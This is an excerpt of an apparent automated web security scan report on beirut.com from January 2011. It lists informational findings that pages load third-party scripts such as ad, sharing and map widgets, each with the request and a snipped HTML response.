21.593. http://www.beirut.com/Nightlife/Karantina/The-Library/113

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Karantina/The-Library/113

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
  • http://www.jscache.com/wejs?wtype=selfserveprop&uniq=478&locationId=1224403&lang=en_US&rating=true&nreviews=5&writereviewlink=true&popIdx=true&iswide=false&linkt=1

Request

GET /Nightlife/Karantina/The-Library/113 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</div>
   <script src="http://www.jscache.com/wejs?wtype=selfserveprop&amp;uniq=478&amp;locationId=1224403&amp;lang=en_US&amp;rating=true&amp;nreviews=5&amp;writereviewlink=true&amp;popIdx=true&amp;iswide=false&amp;linkt=1"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.594. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Karaoke-Lounges/8094927980

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Karaoke-Lounges/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:36:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.595. http://www.beirut.com/Nightlife/Lounges/9663063907

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Lounges/9663063907

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Lounges/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:33:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.596. http://www.beirut.com/Nightlife/Nightclubs/311071488

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Nightclubs/311071488

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Nightclubs/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:33:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.597. http://www.beirut.com/Nightlife/Pubs/242334555

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Pubs/242334555

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Pubs/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:26:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.598. http://www.beirut.com/Nightlife/Super-Nightclub/131874060

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Super-Nightclub/131874060

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Super-Nightclub/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.599. http://www.beirut.com/Online-Internet/Blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Blogs

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Blogs HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:50:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.600. http://www.beirut.com/Online-Internet/Business/56859781

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Business/56859781

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Business/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:51:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.601. http://www.beirut.com/Online-Internet/Classifieds/395527905

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Classifieds/395527905

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Classifieds/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:14:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.602. http://www.beirut.com/Online-Internet/Design-services/3885810200

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Design-services/3885810200

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Design-services/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:17:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.603. http://www.beirut.com/Online-Internet/Directories/0054751592

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Directories/0054751592

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Directories/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:18:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.604. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Fashion-and-Shopping/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:20:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
